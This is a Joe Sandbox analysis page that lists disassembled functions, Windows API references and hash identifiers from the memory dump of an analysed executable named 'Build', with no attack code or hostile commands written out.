Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6fb3c385f392d7c9189ff324b0f3b35e5ee0ea7d56e1007ab2de0cbb12736cec
Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
Opcode Fuzzy Hash: 6fb3c385f392d7c9189ff324b0f3b35e5ee0ea7d56e1007ab2de0cbb12736cec
Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171

Function 009408E7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009408A7

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92a1cc1e6514b74c149c33b50fcdea593a8c8a880af0c03e138d8660d703d5ff
Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
Opcode Fuzzy Hash: 92a1cc1e6514b74c149c33b50fcdea593a8c8a880af0c03e138d8660d703d5ff
Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171

Function 00940A1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f0af2d1ef7f6be70c85a90a6c3c0aabc201f958d300c017d273801fbe4bcf4a
Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
Opcode Fuzzy Hash: 7f0af2d1ef7f6be70c85a90a6c3c0aabc201f958d300c017d273801fbe4bcf4a
Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231

Function 00940A32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1601f8a2c1814da6fde69f1261ed8f880d5c2fb3d5efacf3b2dda10564a1e009
Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
Opcode Fuzzy Hash: 1601f8a2c1814da6fde69f1261ed8f880d5c2fb3d5efacf3b2dda10564a1e009
Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231

Function 00940A3C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 661e48b34b02576ed9b31a8b4bcf12f3697ce64dbcd0949a9dda16e3a4137cbf
Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
Opcode Fuzzy Hash: 661e48b34b02576ed9b31a8b4bcf12f3697ce64dbcd0949a9dda16e3a4137cbf
Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231

Function 00940A50 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00940A5D

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61dd7df43e16d91fb1c1f2829b4cd9ae489e2e71c49a7e6c54a95c73318e81bb
Instruction ID: 50b5f50ccb7f71f22dfabc7ee3f5ca44512b3b6011ef285f158fe4d1a258dde5
Opcode Fuzzy Hash: 61dd7df43e16d91fb1c1f2829b4cd9ae489e2e71c49a7e6c54a95c73318e81bb
Instruction Fuzzy Hash: 9EA002D5695201FC3109B1959D2AD36025CD4C0B25730991AF645D50C16465184D5131

Function 00940A46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009409FC

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 25cbb9716d21c0e533c5acd6232ee19d9be74350d8568820bf8e4fc12e603b63
Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
Opcode Fuzzy Hash: 25cbb9716d21c0e533c5acd6232ee19d9be74350d8568820bf8e4fc12e603b63
Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231

Function 00940A7F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00940A5D

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd26cd7e1c17fd359378ba94759449a3724b47c490224c296b8e9f30eeb2a546
Instruction ID: e23fc0a13b513aa4e42ce07b444408372f4cb22d215a861d6f6c029be8fd5a53
Opcode Fuzzy Hash: bd26cd7e1c17fd359378ba94759449a3724b47c490224c296b8e9f30eeb2a546
Instruction Fuzzy Hash: E9A002D5699201FC310971959D26D36015CD4C4B657309D1AF545C50C15465184D5131

Function 00940A6B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00940A5D

Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7301770244597e4e581dc2fec9264c57e7b2651984c1ea9ca67fa6dd768478a4
Instruction ID: e23fc0a13b513aa4e42ce07b444408372f4cb22d215a861d6f6c029be8fd5a53
Opcode Fuzzy Hash: 7301770244597e4e581dc2fec9264c57e7b2651984c1ea9ca67fa6dd768478a4
Instruction Fuzzy Hash: E9A002D5699201FC310971959D26D36015CD4C4B657309D1AF545C50C15465184D5131

Function 0092B949 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0092A712,?,?,?,?,?,?,?), ref: 0092B94C

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 6008ca195f1d5c7ca24db507f7f12f82ee84b193831f1b5c23ecbe1d71133dc0
Instruction ID: f78c8754ff5ade8e333b8f23169ad7aef5be6b3bcf0542373a86c030c1aa9877
Opcode Fuzzy Hash: 6008ca195f1d5c7ca24db507f7f12f82ee84b193831f1b5c23ecbe1d71133dc0
Instruction Fuzzy Hash: CDA011300A800A8A8E002B32CA0800E3B20EB20BC230002A8A00BCB0A2CB22880BAB00

Function 0093CBB6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0093CBBA

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: fcd61643e77f93018fd749449f48dbcb83435080f63bdb214d85387412cfd1a5
Instruction ID: 19f81027b5928b2a5a096c4c1a1dfd01ecf63d6486e98c3a0effbc2a0303b372
Opcode Fuzzy Hash: fcd61643e77f93018fd749449f48dbcb83435080f63bdb214d85387412cfd1a5
Instruction Fuzzy Hash: A6A011302082008B82000B328F0AA0EBAAAAFA2A02F00C028A00280030CB328820BA00

Non-executed Functions

Function 0093E560 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 240windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0093E602
EndDialog.USER32(?,00000006), ref: 0093E615
GetDlgItem.USER32(?,0000006C), ref: 0093E631
SetFocus.USER32(00000000), ref: 0093E638
SetDlgItemTextW.USER32(?,00000065,?), ref: 0093E66C
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0093E69F
FindFirstFileW.KERNEL32(?,?), ref: 0093E6B5

Part of subcall function 0093CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CBEE
Part of subcall function 0093CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0093CC05
Part of subcall function 0093CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 0093CC19
Part of subcall function 0093CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CC2A
Part of subcall function 0093CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0093CC42
Part of subcall function 0093CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0093CC66
Part of subcall function 0093CBC8: _swprintf.LIBCMT ref: 0093CC85

_swprintf.LIBCMT ref: 0093E704

Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0093E717
FindClose.KERNEL32(00000000), ref: 0093E71E
_swprintf.LIBCMT ref: 0093E773
SetDlgItemTextW.USER32(?,00000068,?), ref: 0093E786
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0093E7A0
_swprintf.LIBCMT ref: 0093E7D9
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0093E7EC
_swprintf.LIBCMT ref: 0093E83C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0093E84F

Part of subcall function 0093D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0093D0E1
Part of subcall function 0093D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,0096272C,?,?), ref: 0093D12A

Strings

%s %s, xrefs: 0093E6F1, 0093E6FD, 0093E769, 0093E7CF, 0093E832
REPLACEFILEDLG, xrefs: 0093E59C

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
String ID: %s %s$REPLACEFILEDLG
API String ID: 3464475507-439456425
Opcode ID: 98f1c5628f14f1f9f98e0b0839edf53fd866e381a57991c02802810e28399f5a
Instruction ID: c67c96454f999f0ca1b22e5bc5b5b559b7bb40ea584413701bd7f00e7e38b794
Opcode Fuzzy Hash: 98f1c5628f14f1f9f98e0b0839edf53fd866e381a57991c02802810e28399f5a
Instruction Fuzzy Hash: 2C71B372649354BBE731ABA4EC4AFFFB7ACEB89700F000819F649D21C1D67599049B62

Function 00927FD3 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 365fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092807F
_wcslen.LIBCMT ref: 00928112

Part of subcall function 00928C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00928CB2
Part of subcall function 00928C95: GetLastError.KERNEL32 ref: 00928CF6
Part of subcall function 00928C95: CloseHandle.KERNEL32(?), ref: 00928D05

Part of subcall function 0092BC65: DeleteFileW.KERNELBASE(?,?,?,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092BC82
Part of subcall function 0092BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?), ref: 0092BCAE

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 009281C1
CloseHandle.KERNEL32(00000000), ref: 009281DD
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,1C667296,00000000), ref: 00928329

Part of subcall function 0092B7E2: FlushFileBuffers.KERNEL32(?), ref: 0092B7FC
Part of subcall function 0092B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 0092B8B0

Part of subcall function 0092AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,0092AF75,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092AFEB

Part of subcall function 0092C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0092BF5E,?,?), ref: 0092C305
Part of subcall function 0092C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0092BF5E,?,?), ref: 0092C334

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 0092803E
\??\, xrefs: 009280A1
UNC\, xrefs: 009280D2
SeRestorePrivilege, xrefs: 00928034

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 243576179-3508440684
Opcode ID: 0b9bf7dfbd46e3ff0190c803e5d03327ce4c3767b7688b58997058d3cc6ddddc
Instruction ID: 831e19109e3ecd3cd94680b73b8cce0a1e21ed07eca63f6b2de3949f57c1939f
Opcode Fuzzy Hash: 0b9bf7dfbd46e3ff0190c803e5d03327ce4c3767b7688b58997058d3cc6ddddc
Instruction Fuzzy Hash: F2D192B1901259ABDB21EFA0DC41BEFB7ACBF44700F00451AFA55E7285DB74AA44CBA1

Function 00941FCA Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00941FD6
IsDebuggerPresent.KERNEL32 ref: 009420A2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009420C2
UnhandledExceptionFilter.KERNEL32(?), ref: 009420CC

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_920000_Build.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e5a80e674ff84c7a57f3c930c3ae8e4b452287d00934d5f1e999c5e90956869f
Instruction ID: 7ff2c460f341dd24751ae8fbc7bd018806c20af0f0f18456bdee3716d9665db0
Opcode Fuzzy Hash: e5a80e674ff84c7a57f3c930c3ae8e4b452287d00934d5f1e999c5e90956869f
Instruction Fuzzy Hash: 90312975D053189BDB20DFA5D989BCCBBB8BF08300F5041EAE40DAB251EB715A84CF04

Function 00940B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00940AC5,0000001C,00940CBA,00000000,?,?,?,?,?,?,?,00940AC5,00000004,00985D24,00940D4A), ref: 00940B91
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00940AC5,00000004,00985D24,00940D4A), ref: 00940BAC

Strings

D, xrefs: 00940BA0

Memory Dump Source

Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true

Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
